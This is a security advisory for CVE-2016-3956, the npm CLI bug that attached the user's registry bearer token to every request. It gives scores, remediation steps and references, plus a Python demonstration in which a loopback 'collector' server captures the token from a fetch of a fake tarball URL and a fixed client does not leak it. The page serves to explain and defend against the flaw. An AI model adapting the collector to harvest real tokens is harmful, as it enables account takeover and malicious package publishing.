CVSS2: 5.0 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.002 Low (percentile 61.9%)
Affected versions of the npm package (the npm CLI) send the bearer token of the logged-in user with every HTTP request the CLI makes, even when the request is not directed at the user's active registry.
An attacker could run an HTTP server that collects tokens and, by various means including but not limited to install scripts, cause the npm CLI to make a request to that server, which would disclose the user's token.
A token obtained this way could be used to do anything the user could do, including publishing new packages under the user's name.
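The following is an added example written for this page, not npm's code. It models the two behaviours described above: a client that attaches its registry bearer token to every request (affected versions) and one that sends it only to the configured registry (the fixed behaviour), and it shows how a hostile server the CLI is tricked into contacting, for instance via an install script, captures the token in the first case and gets nothing in the second. The collector server, the token value, the registry and package URLs and the header-policy function are all constructed for the demonstration.

```python
"""CVE-2016-3956 demonstration: leaking a registry bearer token to a third party.

Everything here is constructed for the example. `auth_headers` is a stand-in
for the CLI's decision of when to attach "Authorization: Bearer <token>";
`Collector` is an attacker-controlled HTTP server that records that header.
"""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit
from urllib.request import ProxyHandler, Request, build_opener

TOKEN = "npm_example_token_0123456789"          # constructed stand-in for a real token
REGISTRY = "https://registry.npmjs.org/"        # the user's active registry


def auth_headers(url, registry, token, leak_everywhere):
    """Headers the client would send when fetching `url`.

    leak_everywhere=True models affected npm versions: the token goes out on
    every request.  False models the fix: the token is sent only when `url`
    is on the configured registry (same scheme and host, path under the
    registry path), so a download from any other origin carries no credential.
    """
    if token is None:
        return {}
    if leak_everywhere:
        return {"Authorization": f"Bearer {token}"}
    u, r = urlsplit(url), urlsplit(registry)
    same_origin = (u.scheme, u.netloc) == (r.scheme, r.netloc)
    registry_path = r.path.rstrip("/") + "/"
    if same_origin and (u.path + "/").startswith(registry_path):
        return {"Authorization": f"Bearer {token}"}
    return {}


class Collector(BaseHTTPRequestHandler):
    """Attacker's server: answers anything and records the Authorization header."""
    captured = []

    def do_GET(self):
        Collector.captured.append(self.headers.get("Authorization"))
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.end_headers()
        self.wfile.write(b"not-really-a-tarball")

    def log_message(self, *args):   # keep the demo output quiet
        pass


def run_scenario(leak_everywhere):
    """Victim CLI logged in to REGISTRY is induced to fetch from the attacker's
    host (e.g. an install script or an off-registry tarball URL).  Returns the
    Authorization value the attacker captured, or None if nothing leaked."""
    Collector.captured = []
    server = HTTPServer(("127.0.0.1", 0), Collector)   # loopback, random port
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        attacker_url = f"http://127.0.0.1:{server.server_port}/evil-1.0.0.tgz"
        headers = auth_headers(attacker_url, REGISTRY, TOKEN, leak_everywhere)
        opener = build_opener(ProxyHandler({}))          # ignore any proxy env vars
        with opener.open(Request(attacker_url, headers=headers), timeout=5) as resp:
            resp.read()
    finally:
        server.shutdown()
        server.server_close()
    return Collector.captured[0] if Collector.captured else None


if __name__ == "__main__":
    print("affected behaviour, attacker captured:", run_scenario(True))
    print("fixed behaviour, attacker captured:   ", run_scenario(False))
```

The origin check in `auth_headers` is deliberately strict: a request to `registry.npmjs.org.evil.example`, to the registry over plain `http://`, or to a sibling path on a shared host gets no token. Note that the fix only stops future leaks; a token that has already been captured remains valid until it is revoked.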
Remediation: upgrade to a fixed npm release (npm@2.15.1 or npm@3.8.3 and later), for example:
npm install npm@latest -g
Because a token that was already disclosed stays valid until revoked, also run npm logout (which revokes the current token on the registry) and log in again to obtain a fresh one.
blog.npmjs.org/post/142036323955/fixing-a-bearer-token-vulnerability
www-01.ibm.com/support/docview.wss?uid=swg21980827
github.com/advisories/GHSA-m5h6-hr3q-22h5
github.com/npm/npm/commit/f67ecad59e99a03e5aad8e93cd1a086ae087cb29
github.com/npm/npm/commit/fea8cc92cee02c720b58f95f14d315507ccad401
github.com/npm/npm/issues/8380
nodejs.org/en/blog/vulnerability/npm-tokens-leak-march-2016/
nvd.nist.gov/vuln/detail/CVE-2016-3956
www.npmjs.com/advisories/98